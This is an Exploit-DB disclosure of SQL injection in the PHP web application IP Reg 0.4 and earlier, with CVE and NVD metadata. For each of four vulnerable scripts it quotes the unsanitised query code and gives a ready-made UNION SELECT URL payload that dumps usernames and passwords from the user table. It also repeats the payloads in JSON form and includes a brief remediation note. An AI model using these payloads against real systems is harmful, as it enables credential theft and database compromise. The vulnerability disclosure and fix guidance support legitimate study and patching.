IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities
2008-10-16T00:00:00
ID EDB-ID:6765 Type exploitdb Reporter JosS Modified 2008-10-16T00:00:00
Description
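IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities (CVE-2008-4606). Web application exploit for the PHP platform. Per the NVD record quoted at the end of this page, CVE-2008-4606 covers only the locationdel.php and vlanedit.php vectors; the vlanview.php and vlandel.php vectors are tracked under CVE-2007-6579.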
# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities
# url: http://sourceforge.net/projects/ipreg/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
-------------------------
vuln file: /locationdel.php
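vuln code (location_id is read straight from $_GET and interpolated into the query with no escaping or type check, and die(mysql_error()) returns the database error text to the client; binding the value in a prepared statement, or casting it to an integer if the ids are numeric, removes the injection point. The three vlan*.php files below repeat the same pattern with vlan_id):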
27: $location_id = $_GET['location_id'];
xx: ...
42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error());
PoC: /locationdel.php?location_id='[foo]
Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlanview.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error());
PoC: /vlanview.php?vlan_id='[foo]
Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlanedit.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error());
PoC: /vlanedit.php?vlan_id='[foo]
Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlandel.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error());
PoC: /vlandel.php?vlan_id='[foo]
Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
# milw0rm.com [2008-10-16]
{"bulletinFamily": "exploit", "id": "EDB-ID:6765", "cvelist": ["CVE-2008-4606"], "modified": "2008-10-16T00:00:00", "lastseen": "2016-02-01T00:36:15", "edition": 1, "sourceData": "# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities\n# url: http://sourceforge.net/projects/ipreg/\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n#\n# Greetz To: All Hackers and milw0rm website\n\n-------------------------\n\nvuln file: /locationdel.php\nvuln code:\n27: $location_id = $_GET['location_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT location_name FROM location WHERE location_id='$location_id'\") or die(mysql_error());\n\nPoC: /locationdel.php?location_id='[foo]\nExploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlanview.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'\") or die(mysql_error\n ());\n\nPoC: /vlanview.php?vlan_id='[foo]\nExploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlanedit.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'\") or die(mysql_error\n ());\n\nPoC: /vlanedit.php?vlan_id='[foo]\nExploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlandel.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'\") or 
die(mysql_error\n ());\n\nPoC: /vlandel.php?vlan_id='[foo]\nExploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n# milw0rm.com [2008-10-16]\n", "published": "2008-10-16T00:00:00", "href": "https://www.exploit-db.com/exploits/6765/", "osvdbidlist": ["49232", "49231"], "reporter": "JosS", "hash": "fdbbf30aaa1bafae0f7b23c7e176b013607ee07bed66404d2df2971a4de5ec1a", "title": "IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities. CVE-2008-4606. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6765/", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2008-4606", "type": "cve", "title": "CVE-2008-4606", "description": "Multiple SQL injection vulnerabilities in IP Reg 0.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) location_id parameter to locationdel.php and (2) vlan_id parameter to vlanedit.php. NOTE: the vlanview.php and vlandel.php vectors are already covered by CVE-2007-6579.", "published": "2008-10-17T20:18:53", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4606", "cvelist": ["CVE-2008-4606"], "lastseen": "2017-09-29T14:26:09"}]}}